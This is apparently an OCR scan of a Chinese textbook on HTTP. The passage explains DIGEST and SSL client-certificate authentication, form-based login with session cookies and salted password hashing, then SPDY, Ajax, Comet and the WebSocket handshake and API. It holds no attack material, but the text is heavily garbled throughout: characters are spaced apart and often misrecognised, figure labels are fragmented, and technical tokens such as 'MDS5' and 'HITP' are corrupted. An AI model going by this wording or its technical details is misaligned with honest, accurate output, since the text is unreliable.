任何 附加 信息 即 可 对 其 解码 。 换 言 之 ， 由 于 明文 解码 后 就 是 用 户 ID 
和 和 密码， 在 HITP 等 非 加 密 通 信和 的 线路 上 进行 BASIC 认证 的 过 程 
中 ， 如 宁 和 被 人 神 听 ， 被 盗 的 可 能 性 极 高 。 


另外 ， 除 此 之 外 想 再 进行 一 次 BASIC 认证 时 ， 一 般 的 浏览 器 却 无 法 
实现 认证 注销 操作 ， 这 也 是 问题 之 一 。 

BASIC 认证 使 用 上 不 够 便捷 灵活 ， 且 达 不 到 多 数 Web 网 站 期 望 的 安 
全 性 等 级 ， 因 此 它 并 不 常用 。 

8.3 ”DIGEST 认证 


为 弥补 BASIC 认证 存在 的 弱点 ， 从 HTTP/1.1 起 就 有 了 DIGEST 认 
证 。 DIGEST 认证 同样 使 用 质询 / 啊 应 的 方式 
Cchallenge/response) ， 但 不 会 像 BASIC 认证 那样 直接 发 送 明 文 密 








所 谓 质 询 啊 应 方式 是 指 ， 一 开始 一 方 会 先 发 送 认证 要 求 给 妨 一 方 ， 接 
着 使 用 从 另 一 方 那 接收 到 的 质询 码 计算 生成 啊 应 码 。 节 后 将 啊 应 码 返 
回 给 对 方 进行 认证 的 方式 。 
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认证 要 求 


一 qq) 


质询 码 





响应 响应 码 


一 


因为 发 送 给 对 方 的 只 是 啊 应 摘要 及 由 质询 码 产生 的 计算 结果 ， 所 以 比 
起 BASIC 认证， 密码 泄露 的 可 能 性 就 降低 了 。 


DIGEST 认证 的 认证 步骤 





发 送 请 求 


(B= GET /digest/ HTTP/1.1 
日 Host: hackr.jp 


客户 端 中 发 送 临 时 的 质询 码 ( 随机 数 ，nonce ) 以 及 告知 需要 认证 的 
状态 码 401 


HTTP/1.1 401 Authorization Required 

WWWAuthenticate: Digest realm="DIGEST 
nonce="MOSQZOitBAA=44abb6784cc9cbfc605a5b0893d36f23de 服务 器 
95fcff", algorithm=MDS5, qop="auth" 


@) , 2 发送 摘 要 以 及 由 质询 码 计 算出 的 响应 码 ( response ) 


al GET /digest/ HTTP/1.1 
Host: hackr.jp 
Authorization: Digest username="guest", realm="DIGEST", 
nonce="MOSQZOItBAA=44abb6784cc9cbfc605a5b0893d36f23de95f 
cff', uri="/digest/”', algorithm=MDS, 
response="df56389ba3f7c52e9d7551115d67472f", qop=auth, 
nc=00000001, cnonce="082c875dcb2ca740" 








3) 认 证 成 功 返 回 状 态 码 200， 失 败 则 再 次 发 送 状 态 码 401 


HTTP/1.1 200 OK 
Authentication-lnfo: 


rspauth="f218e9ddb407a3d16f2f7d2c4097e900", 
cnonce="082c875dcb2ca740", nc=00000001, qop=auth 





图 : DIGEST 认证 概要 


步骤 1: 请 求 需 认 证 的 资源 时 ， 服 务 器 会 随 着 状态 码 401 
Authorization Required， 返 回 带 WWW-Authenticate 首部 字段 的 响应 。 
该 字段 内 包含 质问 响应 方式 认证 所 需 的 临时 质询 码 〈 随 机 数 ， 


nonce) 。 
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首部 字段 WWW-Authenticate 内 必须 包含 realm 和 nonce 这 两 个 字段 的 
信息 。 客 户 端 就 是 依靠 癌 服 务 器 回 送 这 两 个 值 进 行 认证 的 。 


nonce 是 一 种 每 次 随 返 回 的 401 啊 应 生成 的 任意 随机 字符 串 。 该 字符 
串通 常 推荐 由 Base64 编码 的 十 六 进 制 数 的 组 成 形式 ， 但 实际 内 容 依 
赖 服务 器 的 具体 实现 。 


步骤 2: 接收 到 401 状态 码 的 客户 端 ， 返 回 的 啊 应 中 包含 DIGEST 认 
证 必须 的 首部 字段 Authorization 信息 。 





首部 字段 Authorization 内 必须 包含 username、realm、nonce、uri 和 
response 的 字段 信息 。 其 中 ，realm 和 nonce 就 是 之 前 从 服务 器 接收 到 
的 啊 应 中 的 字段 。 


username 是 realm 限定 范围 内 可 进行 认证 的 用 户 名 。 

uri (digesturi) 即 Request-URI 的 值 ， 但 考虑 到 经 代理 转发 后 
Request-URI 的 值 可 能 被 修改 ， 因 此 事先 会 复制 一 份 副 本 保存 在 uri 
内 。 

response 也 可 叫做 RequestDigest， 存 放 经 过 MD5 运算 后 的 密码 字符 
串 ， 形 成 啊 应 码 。 

啊 应 中 其 他 的 实体 请 参见 第 6 章 的 请 求 首 部 字段 Authorization。 另 
外 ， 有 关 Request-Digest 的 计算 规则 较 复 杂 ， 有 兴趣 的 读者 不 妨 深 入 
学 习 一 下 RFC2617。 


步骤 3: 接收 到 包含 首部 字段 Authorization 请 求 的 服务 器 ， 会 确认 认 
证 信息 的 正确 性 。 认 证 通过 后 则 返回 包含 Request-URI 资源 的 啊 应 。 


并 且 这 时 会 在 首部 字段 Authentication-Info 写 入 一 些 认证 成 功 的 相关 信 
息 。 











DIGEST 认证 提供 了 高 于 BASIC 认证 的 安全 等 级 ， 但 是 和 HTTPS 的 
客户 端 认 证 相 比 仍 旧 很 弱 。DIGEST 认证 提供 防止 密码 被 窃听 的 保护 
机 制 ， 但 并 不 存在 防止 用 户 伪装 的 保护 机 制 。 


DIGEST 认证 和 BASIC 认证 一 样 ， 使 用 上 不 那么 便捷 灵活 ， 且 仍 达 不 


到 多 数 Web 网 站 对 高 度 安 全 等 级 的 追求 标准 。 因 此 它 的 适用 范围 也 
有 所 受 限 。 
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8.4 SSL 客 户 疹 认 证 


从 使 用 用 户 ID 和 密码 的 认证 方式 方面 来 讲 ， 只 要 二 者 的 内 容 正确 ， 
即 可 认证 是 本 人 的 行为 。 但 如 果 用 户 ID 和 密码 被 盗 ， 就 很 有 可 能 被 
第 三 者 冒充 。 利 用 SSL 客 户 端 认 证 则 可 以 避免 该 情况 的 发 生 。 

SSL 客户 端 认证 是 借 由 HITPS 的 客户 端 证 书 完成 认证 的 方式 。 和 凭借 
客户 端 证 书 〈 在 HTTPS 一 章 已 讲解 ) 认证 ， 服 务 器 可 确认 访问 是 否 
来 自己 登录 的 客户 端 。 


8.4.1 SSL 客户 端 认证 的 认证 步骤 


为 达到 SSL 客户 端 认 证 的 目的 ， 需 要 事先 将 客户 端 证 书 分 发 给 客户 
端 ， 且 客户 端 必须 安装 此 证 书 。 
步骤 1:， 接收 到 需要 认证 资源 的 请 求 ， 服 务 器 会 发 送 Certificate 
Request 报 文 ， 要 求 客户 端 提供 客户 并 证 书 。 
步骤 2: 用 户 选择 将 发 送 的 客户 端 证 书后 ， 客 户 端 会 把 客户 端 证 书信 
居 以 Client Certificate 报 文 方式 发 送 给 服务 器 。 

证 蔬 Cx 


常规 。 | 诗 细 信息 [证书 路 径 | 











民 。 证 书信 息 


这 个 证 书 的 目的 如 下 : 
。 保 证 远程 计算 机 的 身份 
。 向 远程 计算 机 证 明 您 的 身份 
。2,16,840,1,113733,1,7,23,6 
。2,16,840,1,113730,4,1 


* 有 关 详 细 信息 ， 请 参考 证 书 颁 发 机 构 的 说 明 。 


颁发 给 : entryl1,bk.mufg.jp 


颁发 者 : ”VeriSign Class 3 Extended Validation SSL 
SGC CA 


有 效 期 从 星期 二 06- 04 到 星期 六 08- ! 





颁发 者 说 明 (S) | 
了 和 解 证 书 的 详细 信息 




















确定 





图 : 选择 客户 端 证 书 示 例 〈( 三 萎 东 和 泵 UFJ 银行 ) 
步骤 3: 服务 器 验证 客户 端 证 书 验证 通过 后 方 可 领取 证 书 内 容 户 站 的 
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公开 密 钥 ， 然 后 开始 HTTPS 加 密 通信 。 
8.4.2 ”SSL 客户 端 认证 采用 双 因 素 认 证 


在 多 数 情 况 下 ，SSL 客户 端 认 证 不 会 仅 依 靠 证 书 完成 认证 ， 一 般 会 和 
基于 表单 认证 〈 稍 后 讲解 ) 组 合 形 成 一 种 双 因 素 认 证 〈Two-factor 
authentication) 来 使 用 。 所 谓 双 因素 认证 束 是 指 ， 认 证 过 程 中 不 仅 需 
要 密码 这 一 个 因素 ， 还 需要 申请 认证 者 提供 其 他 持 有 信息 ， 从 而 作为 
另 一 个 因素 ， 与 其 组 合 使 用 的 认证 方式 。 


换言之 ， 第 一 个 认证 因 系 的 SSL 客户 端 证 书 用 来 认证 客户 器 计算 机 ， 
为 一 个 认证 因素 的 密码 则 用 来 确定 这 是 用 户 本 人 的 行为 。 


通过 双 因 素 认证 后 ， 就 可 以 确认 是 用 户 本 人 正在 使 用 匹配 正确 的 计算 
机 访问 服务 器 。 
8.4.3 ”SSL 客户 端 认 证 必要 的 费用 


使 用 SSL 客户 端 认 证 需要 用 到 客户 端 证 书 。 而 客户 端 证 书 需要 文 付 一 
定 费用 才能 使 用 。 


这 里 提 到 的 费用 是 指 ， 从 认证 机 构 购 买 客户 端 证 书 的 费用 ， 以 及 服务 
器 运营 者 为 保证 自己 搭建 的 认证 机 构 安全 运营 所 产生 的 费用 。 


每 个 认证 机 构 颁 发 客户 站 证 书 的 费用 不 尽 相 同 ， 平 挫 到 一 张 证 书 上 ， 


一 年 费用 约 几 万 至 十 几 万 日 元 。 服 务 器 运营 者 也 可 以 目 己 搭建 认证 机 
构 ， 但 要 维持 安全 运行 就 会 产生 相应 的 费用 。 


8.5 ”基于 表单 认证 


基于 表单 的 认证 方法 并 不 是 在 HITP 协议 中 定义 的 。 客 户 端 会 向 服务 
器 上 的 Web 应 用 程序 发 送 登 录 信息 〈Credential) ， 按 登录 信息 的 验 
证 结果 认证 。 


0 Web 应 用 程序 的 实际 安装 ， 提 供 的 用 户 界 面 及 认证 方式 也 各 不 
日 同 。 
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(加 1 欢迎 使 用 Gmail 


Google 提供 的 电子 邮件 服务 。 
Gmail 的 开发 理念 是 ， 电子 邮件 可 以 更 加 直观 、 高 效 而 实用 ， 甚 至 可 和 
能 很 有 趣 。 毕竟 ，Gmail 具有 以 下 特点 : Googie 帐户 
SS 减少 垃圾 邮件 用 户 名 : 
利用 Google 的 创新 技术 可 以 将 垃圾 邮件 拒 于 收 件 箱 之 如 : 
外 。 pat@exa p 
密码 : 
信和 的 
将 手机 的 网 络 浏览 器 指向 http://gmail.com ， 便 可 以 Y 保持 登录 状态 
在 您 的 手机 上 查阅 Gmail。 了 解 闫 全 登录 


[NS 超大 空间 
超过 7497.396475 MB ( 还 在 不 断 增 加 ) 的 免费 存储 空 
间 。 


最 新 通知 : 隐私 权 政策 已 进行 了 简化 和 更 新 。 了 解 更 多 信息 . 


图 : 基于 表单 认证 示例 (Google) 


多 数 情 况 下 ， 输 入 已 事先 登录 的 用 户 DD〈 通 第 是 任意 字符 串 或 邮件 
地 址 ) 和 密码 等 登录 信息 后 ， 发 送 给 Web 应 用 程序 ， 基 于 认证 结果 
来 决定 认证 是 否 成 功 。 


8.5.1 认证 多 半 为 基于 表单 认证 


由 于 使 用 上 的 便利 性 及 安全 性 问题 ，HTTP 协议 标准 提供 的 BASIC 认 
证 和 DIGEST 认证 几乎 不 怎么 使 用 。 男 外 ，SSL 客户 端 认证 虽然 具有 
高 度 的 安全 等 级 ， 但 因为 导入 及 维持 费用 等 问题 ， 还 尚未 普及 。 


比如 SSH 和 FTP 协议 ， 服 务 器 与 客户 端 之 间 的 认证 是 合乎 标准 规范 
的 ， 并 且 满 足 了 最 基本 的 功能 需求 上 的 安全 使 用 级 别 ， 因 此 这 些 协议 
的 认证 可 以 拿 来 直接 使 用 。 但 是 对 于 Web 网 站 的 认证 功能 ， 能 够 满 
足 其 安全 使 用 级 别 的 标准 规范 并 不 存在 ， 所 以 只 好 使 用 由 Web 应 用 
程序 各 自 实现 基于 表单 的 认证 方式 。 


不 具备 共同 标准 规范 的 表单 认证 ， 在 每 个 Web 网 站 上 都 会 有 各 不 相 
同 的 实现 方式 。 如 采 是 全 面 考虑 过 安全 性 能 而 实现 的 表单 认证 ， 那 么 
就 能 够 具备 高 度 的 安全 等 级 。 但 在 表单 认证 的 实现 中 存在 问题 的 Web 
网 站 也 是 屡见不鲜 。 
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8.5.2 Session 管理 及 Cookie 应 用 
基于 表单 认证 的 标准 规范 尚未 有 定论 ， 一 般 会 使 用 Cookie 来 管理 


Session (会 话 ) 。 


基于 表单 认证 本 身 是 通过 服务 器 端的 Web 应 用 ， 将 客户 端 发 送 过 来 
的 用 户 D 和 密码 与 之 前 登录 过 的 信息 做 匹配 来 进行 认证 的 。 


但 鉴于 HTTP 是 无 状态 协议 ， 之 前 已 认证 成 功 的 用 户 状态 无 法 通过 协 
议 层面 保存 下 来 。 即 ， 无 法 实现 状态 管理 ， 因 此 即使 当 该 用 户 下 一 次 
继续 访问 ， 也 无 法 区 分 他 与 其 他 的 用 户 。 于 是 我 们 会 使 用 Cookie 来 
管理 Session， 以 弥补 HTTP 协议 中 不 存在 的 状态 管理 功能 。 








1 发送 已 登录 信息 ( 用 户 ID， 密 码 ) 


向 用 户 发 放 Session 


ID, 记录 认证 状态 





2) 发 送 包 含 Session ID 的 Cookie 
Set-Cookie: PHPSESSID=028a8c...; 





3) 发 送 包 含 Session ID 的 Cookie 
Cookie: PHPSESSID=028a8c... 





图 : Session 管理 及 Cookie 状态 管理 

步 又 1: 客户 端 把 用 户 ID 和 密码 等 登录 信息 放 入 报 文 的 实体 部 分 ， 
通常 是 以 POST 方法 把 请 求 发 送 给 服务 器 。 而 这 时 ， 会 使 用 HTTPS 
通信 来 进行 HTML 表单 画面 的 显示 和 用 户 输 入 数据 的 发 送 。 

步骤 2: 服务 器 会 发 放 用 以 识别 用 户 的 Session ID。 通 过 验证 从 客户 
端 发 送 过 来 的 登录 信息 进行 身份 认证 ， 然 后 把 用 户 的 认证 状态 与 
Session ID 绑 定 后 记录 在 服务 器 端 。 


回 客 户 端 返回 啊 应 时 ， 会 在 首部 字段 Set-Cookie 内 写 入 Session 
ID (如 PHPSESSID=028a8c...) 。 


你 可 以 把 Session ID 想象 成 一 种 用 以 区 分 不 同 用 户 的 等 位 号 。 
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然而 ， 如 果 Session ID 被 第 三 方 资 走 ， 对 方 就 可 以 伪装 成 你 的 喘 份 进 
行 恶 意 操 作 了 。 因 此 必须 防止 Session ID 被 资 ， 或 被 猜 出 。 为 了 做 到 
这 点 ，Session ID 应 使 用 难以 推测 的 字符 串 ， 且 服务 器 端 也 需要 进行 
有 效 期 的 管理 ， 保 证 其 安全 性 。 


另外 ， 为 减轻 跨 站 脚本 攻击 (XSS) 造成 的 损失 ， 建 议事 先 在 Cookie 
内 加 上 httponly 属性 。 


步骤 3: 客户 端 接 收 到 从 服务 器 端 发 来 的 Session ID 后 ， 会 将 其 作为 
Cookie 保存 在 本 地 。 下 次 回 服务 器 发送 请 求 时 ， 浏 览 器 会 目 动 友 送 
Cookie， 所 以 Session ID 也 随 之 发 送 到 服务 器 。 服 务 句 端 可 通过 验证 
接收 到 的 Session ID 识别 用 户 和 其 认证 状态 。 


除了 以 上 介绍 的 应 用 实例 ， 还 有 应 用 其 他 不 同方 法 的 案例 。 


另外 ， 不 仅 基 于 表单 认证 的 登录 信息 及 认证 过 程 都 无 标准 化 的 方法 ， 
服务 器 端 应 如 何 保存 用 户 提交 的 密码 等 登录 信息 等 也 没有 标准 化 。 

















通常 ， 一 种 安全 的 保存 方法 是 ， 先 利用 给 密码 加 盐 〈salt) :的 方式 增 
加 额外 信息 ， 再 使 用 散 列 〈hash) 函数 计算 出 散 列 值 后 保存 。 但 是 我 
们 也 经 党 看 到 直接 保存 明文 密码 的 做 法 ， 而 这 样 的 做 法 具有 导致 密码 
泄露 的 风险 。 


1 salt 其 实 就 是 由 服务 器 随机 生成 的 一 个 字符 串 ， 但 是 要 保证 长 度 足 够 长 ， 并 且 是 
真正 随机 生成 的 。 然 后 把 它 和 密码 字符 串 相 连接 《前 后 都 可 以 ) 生成 散 列 值 。 当 
两 个 用 户 使 用 了 同一 个 密码 时 ， 由 于 随机 生成 的 salt 值 不 同 ， 对 应 的 散 列 值 也 将 
是 不 同 的 。 这 样 一 来 ， 很 大 程度 上 减少 了 密码 特征 ， 攻 击 者 也 就 很 难 利用 自己 手 
中 的 密码 特征 库 进行 破解 。 一 一 译 者 注 
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第 9 章 基于 HTTP 的 功能 追加 
协议 


虽然 HTTP 协议 既 简 单 又 简捷 ， 但 随 着 时 代 的 发 展 ， 其 功能 使 用 上 捉 
洪 见 肘 的 疲 态 已 经 凸显 。 本 章 我 们 将 讲解 基于 HTTP 新 增 的 功能 的 协 
议 。 





9.1 基于 HTTP 的 协议 


在 建立 HTTP 标准 规范 时 ， 制 订 者 主要 想 把 HTTP 当 作 传输 HTML 文 
档 的 协议 。 随 着 时 代 的 发 展 ，Web 的 用 途 更 具 多 样 性 ， 比 如 演化 成 在 
线 购 物 网 站 、SNS (Social Networking Service， 社 交 网 络 服务 ) 、 企 
业 或 组 织 内 部 的 各 种 管理 工具 ， 等 等 。 

而 这 些 网 站 所 追求 的 功能 可 通过 Web 应 用 和 脚本 程序 实现 。 即 使 这 
些 功能 已 经 满足 需求 ， 在 性 能 上 却 未 必 最 优 ， 这 是 因为 HTTP 协议 上 
的 限制 以 及 自身 性 能 有 限 。 

HTTP 功能 上 的 不 足 可 通过 创建 一 套 全 新 的 协议 来 弥补 。 可 是 目前 基 
于 HTTP 的 Web 浏览 器 的 使 用 环境 已 志 布 全 球 ， 因 此 无 法 完全 抛弃 
HTTP。 有 一 些 新 协议 的 规则 是 基于 HITP 的 ， 并 在 此 基础 上 添加 了 
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新 的 功能 。 
9.2 ”消除 HTTP 瓶颈 的 SPDY 
Google 在 2010 年 发 布 了 SPDY〈 取 自 SPeeDY， 发 音 同 speedy) ， 其 
开发 目标 时 在 解决 HITP 的 性 能 瓶 贷 ， 织 短 Web 页 面 的 加 载 时 间 
(S00 a 

e。 SPDY- The Chromium Projects 


http: /www.chromium.org/spdy/ 


9.2.1 HTTP 的 瓶颈 





在 Facebook 和 Twitter 等 SNS 网 站 上 ， 几 乎 能 够 实时 观察 到 海量 用 户 
公开 发 布 的 内 容 ， 这 也 是 一 种 乐趣 。 当 几 百 、 几 千 万 的 用 户 发 布 内 容 
人 
和 内 容 更 新 。 


为 了 尽 可 能 实时 地 显示 这 些 更 新 的 内 容 ， 服 务 器 上 一 有 内 容 更 新 ， 就 
需要 直接 把 那些 内 容 反 馈 到 客户 端的 界面 上 上。 虽然 看 起 来 挺 简单 的 ， 
但 HTTP 却 无 法 受 善 地 人 处理 好 这 项 任务 。 

使 用 HTTP 协议 探知 服务 器 上 是 否 有 内 容 更 新 ， 驶 必须 频 索 地 从 客户 
i 
徒劳 的 通信 。 


在 想 在 现 有 Web 实现 所 需 的 功能 ， 以 下 这 些 HTTP 标准 就 会 成 为 瓶 











。 一 条 连接 上 只 可 发 送 一 个 请 求 。 
。 请 求 只 能 从 客户 端 开 始 。 客 户 端 不 可 以 接收 除 啊 应 以 外 的 指 


令 。 





。 请求 / 啊 应 首部 未 经 压缩 就 友 送 。 首 部 信息 越 多 延迟 越 大 。 
。 及 送 元 长 的 首部 。 每 次 互相 发 送 相同 的 首部 造成 的 混 费 较 
多 。 
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。 可 任意 选择 数据 压缩 格式 。 非 强制 压缩 发 送 。 








的 请 求 响应 









不 管 是 否 有 更 新 ， 
都 要 把 数据 全 部 
再 发 送 一 次 













图 : 以 前 的 HTTP 通信 
Ajax 的 解决 方法 


Ajax (Asynchronous JavaScript and XML， 异 步 JavaScript 与 XML 技 
术 ) 是 一 种 有 效 利 用 JavaScript 和 DOM (Document Object Model， 文 
档 对 象 模 型 ) 的 操作 ， 以 达到 局 部 Web 页 面 蔡 换 加 载 的 异步 通信 手 
段 。 和 以 前 的 同步 通信 相 比 ， 由 于 它 只 更 新 一 部 分 页 面 ， 啊 应 中 传输 
的 数据 量 会 因此 而 减少 ， 这 一 优点 显而易见 。 


Ajax 的 核心 技术 是 名 为 XMLHttpRequest 的 API， 通 过 JavaScript 脚本 
语言 的 调用 就 能 和 服务 器 进行 HTTP 通信 。 借 由 这 种 手段 ， 就 能 从 已 
加 载 完毕 的 Web 页 面 上 发 起 请 求 ， 只 更 新 局 部 页 面 。 


而 利用 Ajax 实时 地 从 服务 器 获取 内 容 ， 有 可 能 会 导致 大 量 请 求 产 
生 。 另 外 ，Ajax 仍 未 解决 HTTP 协议 本 身 存在 的 问题 。 
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响应 
Et 
.BB 
< 页 面 的 局 部 更 
新 可 能 实现 > 


每 次 都 互相 发 送 相同 的 首部 有 时 不 压 
响应 缩 数据 直 


| 


图 : Ajax 通信 





Comet 的 解决 方法 


一 旦 服务 器 端 有 内 容 更 新 了 ，Comet 不 会 让 请 求 等 待 ， 而 是 直接 给 客 
户 问 返回 啊 应 。 这 是 一 种 通过 延迟 应 答 ， 模 拟 实现 服务 器 端 回 客户 端 
推送 (Server Push) 的 功能 。 


通 第 ， 服 务 右 端 接收 到 请 求 ， 在 处 理 完毕 后 束 会 立即 返回 啊 应 ， 但 为 
了 实现 推送 功能 ，Comet 会 先 将 啊 应 置 于 挂 起 状态 ， 当 服务 器 端 有 内 
容 更 新 时 ， 再 返回 该 啊 应 。 因 此 ， 服 务 喜 端 一 旦 有 更 新 ， 就 可 以 立即 
反馈 给 客户 靖 。 


内 容 上 虽然 可 以 做 到 实时 更 新 ， 但 为 了 保留 啊 应 ， 一 次 连接 的 持续 时 
间 也 变 长 了 。 期 间 ， 为 了 维持 连接 会 消耗 更 多 的 资产。 另外 ，Comet 
也 仍 未 解决 HTTP 协议 本 喘 存 在 的 问题 。 
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< 保留 响应 直 
到 服务 器 内 容 
有 更 新 > 





一 旦 更 新 可 立即 
返回 响应 


有 时 不 压缩 数 
据 直 接 发 送 


< 可 实现 页 面 的 
局 部 更 新 > 










图 : Comet 通信 

SPDY 的 目标 

陆续 出 现 的 Ajax 和 Comet 等 提高 易 用 性 的 技术 ， 一 定 程度 上 使 HITP 
得 到 了 改善 ， 但 HTTP 协议 本 映 的 限制 也 令 人 有 些 束手无策 。 为 了 进 
行 根 本 性 的 改善 ， 需 要 有 一 些 协议 层面 上 的 改动 。 


处 于 持续 开发 状态 中 的 SPDY 协议 ， 正 是 为 了 在 协议 级 别 消 除 HITP 
所 遭遇 的 瓶颈 。 


9.2.2 SPDY 的 设计 与 功能 

SPDY 没有 完全 改写 HTTP 协议 ， 而 是 在 TCP/ 了 下 的 应 用 层 与 运输 层 之 
间 通 过 新 加 会 话 层 的 形式 运作 。 同 时 ， 考 虑 到 安全 性 问题 ，SPDY 规 
定 通信 中 使 用 SSL。 

SPDY 以 会 话 层 的 形式 加 入 ， 控 制 对 数据 的 流动 ， 但 还 是 采用 HTTP 


建立 通信 连接 。 因 此 ， 可 照常 使 用 HITP 的 GET 和 POST 等 方 法 、 
Cookie 以 及 HTTP 报 文 等 。 
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FDR 应 用 层 





SRDY 会 话 层 


SSL 表示 层 








TCP 传输 层 


并 





SPDY 介 于 TCPI(SSDD 和 HTTP 之 间 
图 : SPDY 的 设计 
使 用 SPDY 后 ，HTTP 协议 额外 获得 以 下 功能 。 
多 路 复 用 流 


通过 单一 的 TCP 连接 ， 可 以 无 限制 处 理 多 个 HTTP 请 求 。 所 有 请 求 
的 处 理 都 在 一 条 TCP 连接 上 完成 ， 因 此 TCP 的 处 理 效率 得 到 提高 。 


赋予 请 求 优 先 级 

SPDY 不 仅 可 以 无 限制 地 并 发 处 理 请 求 ， 还 可 以 给 请 求 逐 个 分 配 优先 
级 顺序 。 这 样 主要 是 为 了 在 发 送 多 个 请 求 时 ， 人 解决 因 带 宽 低 而 导致 啊 
应 变 慢 的 问题 。 

压缩 HTTP 首部 


压缩 HTTP 请 求 和 响应 的 首部 。 这 样 一 来 ， 通 信 产 生 的 数据 包 数 量 和 
发 送 的 字 市 数 束 更 少 了 了。 


推送 功能 


支持 服务 句 主 动向 客户 站 推送 数据 的 功能 。 这 样 ， 服 务 名 可 直接 发 送 
数据 ， 而 不 必 等 待 客户 端的 请 求 。 


服务 器 提示 功能 


服务 器 可 以 主动 提示 客户 端 请 求 所 需 的 资源 。 由 于 在 客户 端 发 现 资源 
之 前 就 可 以 获知 资源 的 存在 ， 因 此 在 资源 已 缓存 等 情况 下 ， 可 以 避免 
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发 送 不 必要 的 请 求 。 
9.2.3 SPDY 消 除 Web 瓶颈 了 吗 


希望 使 用 SPDY 时 ，Web 的 内 容 端 不 必 做 什么 特别 改动 ， 而 Web 浏 

览 器 及 Web 服务 器 都 要 为 对 应 SPDY 做 出 一 定 程度 上 的 改动 。 有 好 

几 家 Web 浏览 器 已 经 针对 SPDY 做 出 了 相应 的 调整 。 另 外 ，Web 服 

0 ， 但 把 该 技术 导入 实际 的 Web 网 站 却 
、 主 o 


因为 SPDY 基本 上 只 是 将 单个 域名 ( IP 地址) 的 通信 和 多 路 复 用 ， 所 
以 当 一 个 Web 网 站 上 使 用 多 个 域名 下 的 资源 ， 改 善 效 果 束 会 受到 限 
制 |。 


SPDY 的 确 是 一 种 可 有 效 消除 HTTP 瓶颈 的 技术 ， 但 很 多 Web 网 站 存 
在 的 问题 并 非 仅 仅 是 由 HTTP 壮 贷 所 导致 。 对 Web 本 里 的 速度 提 

升 ， 还 应 该 从 其 他 可 细致 钻研 的 地 方 入 手 ， 比 如 改善 Web 内 容 的 编 
写 方式 等 。 


9.3 ”使 用 浏览 右 进 行 全 双 工 通信 的 
WebSocket 


利用 Ajax 和 Comet 技术 进行 通信 可 以 提升 Web 的 浏览 速度 。 但 问题 
在 于 通信 知 使 用 HTTP 协议 ， 束 无 法 彻底 解决 瓶 锋 问题 。WebSocket 
网 络 技 术 正 是 为 解决 这 些 问题 而 实现 的 一 套 新 协议 及 API。 


当时 筹划 将 WebSocket 作为 HIMLS 标准 的 一 部 分 ， 而 现在 它 却 逐渐 
变 成 了 独立 的 协议 标准 。WebSocket 通信 协议 在 2011 年 12 月 11 日， 
被 RFC 6455 - The WebSocket Protocol 定 为 标准 。 





9.3.1 WebSocket 的 设计 与 功能 

WebSocket， 即 Web 浏览 器 与 Web 服务 器 之 间 全 双 工 通信 标准 。 其 

中 ，WebSocket 协议 由 正 TF 定 为 标准 ，WebSocket API 由 W3C 定 为 
标准 。 仍 在 开发 中 的 WebSocket 技术 主要 是 为 了 解决 Ajax 和 Comet 
里 XMLHttpRequest 附带 的 缺陷 所 引起 的 问题 。 


9.3.2 ”WebSocket 协议 


176 


一 旦 Web 服务 器 与 客户 端 之 间 建 立 起 WebSocket 协议 的 通信 连接 ， 
之 后 所 有 的 通信 都 依靠 这 个 专用 协议 进行 。 通 信 过 程 中 可 互相 发 送 
JSON、XML、HTML 或 图 片 等 任意 格式 的 数据 。 


由 于 是 建立 在 HITP 基础 上 的 协议 ， 因 此 连接 的 发 起 方 仍 是 客户 端 ， 
而 一 旦 确立 WebSocket 通信 连接 ， 不 论 服务 器 还 是 客户 端 ， 任 意 一 方 
都 可 直接 同 对 方 发 送 报 文 。 


下 面 我 们 列举 一 下 WebSocket 协议 的 主要 特点 。 

推送 功能 

支持 由 服务 器 向 客户 端 推 送 数据 的 推送 功能 。 这 样 ， 服 务 器 可 直接 发 
送 数 据 ， 而 不 必 等 待 客户 端的 请 求 。 

减少 通信 量 

只 要 建立 起 WebSocket 连接 ， 就 希望 一 直 保 持 连 接 状 态 。 和 HTTP 相 
比 ， 不 但 每 次 连接 时 的 总 开销 减少 ， 而 且 由 于 WebSocket 的 首部 信息 
很 小 ， 通 信 量 也 相应 减少 了 。 


为 了 实现 WebSocket 通信 ， 在 HITP 连接 建立 之 后 ， 需 要 完成 一 
次 “握手 ”(Handshaking〉 的 步 又 。 


。 握 手 :请 求 


为 了 实现 WebSocket 通信 ， 需 要 用 到 HTTP 的 Upgrade 首部 字 
段 ， 告 知 服务 器 通信 协议 发 生 改 变 ， 以 达到 握手 的 目的 。 


GET /chat HTTP/1.1 

Host: server.example.com 
Upgrade: websocket 
Connection: Upgrade 

















Sec-WebSocket-Key: qdqGh1LIHNhPpXBs2SBub25]j2Q== 
Origin: http://example.com 
Sec-WebSocket-Protocol: chat, superchat 
Sec-WebSocket-Version: 13 























Sec-WebSocket-Key 字段 内 记录 着 握手 过 程 中 必 不 可 少 的 键 值 。 
Sec-WebSocket-Protocol 字段 内 记录 使 用 的 子 协议 。 


” WebSocket 协议 标准 在 连接 分 开 使 用 时 ， 定 义 那 些 连 接 
名称。 
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。 握手: 啊 应 
对 于 之 前 的 请 求 ， 返 回 状态 码 101 Switching Protocols 的 啊 应 。 


HTTP/1.1 101 Switching Protocols 
Upgrade: websocket 


Connection: Upgrade 
Sec-WebSocket-Accept: s3pPLMBiTxaQ9kYGzzhZRbK+xOo= 
Sec-WebSocket-Protocol: chat 














Sec-WebSocket-Accept 的 字段 值 是 由 握手 请 求 中 的 Sec- 
WebSocket-Key 的 字段 值 生成 的 。 


成 功 握 手 确立 WebSocket 连接 之 后 ， 通 信 时 不 再 使 用 HTTP 的 数 
据 巾 ， 而 采用 WebSocket 独立 的 数据 帧 。 








服务 器 
| 于- 计 连接 刚 开始 时 还 是 
Upgrade: websocket HTTP 协 议 , 所 以 由 
HTTP 握手 : 响应 客户 端 先 发 起 连接 





WebSocket 的 URL 格 式 
ws://example.com/ 
WebSocket wss://example.com/ 


发 送 数 据 


, 101 Switching Protocols 切换 成 
WebSocket 协 议 


WebSocket 协 议 支 
发 送 数 据 持 全 双 工 通信 ， 


-| 此 服务 器 端 不 必 竺 
发 送 数据 | 待 请 求 , 可 直接 发 
| 基数 反 


a 


图 : WebSocket 通信 





e WebSocket API 


JavaScript 可 调用 “The WebSocket 
APT”(http://www.w3.org/TR/websockets/， 由 W3C 标准 制定 ) 内 
提供 的 WebSocket 程序 接口 ， 以 实现 WebSocket 协议 下 全 双 工 通 


以 下 为 调用 WebSocket APT， 50ms 发 送 一 次 数据 的 实例 。 
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var socket = new WebSocket('ws://game.example.com:12616 
socket.onopen = function () { 
setInterval(function() { 


if (socket.bufferedAmount == 0) 
socket.send(getUpdateData( ) ) ; 
}，50); 





}; 


9.4 ”期 及 己 信 的 HTTP/2.0 


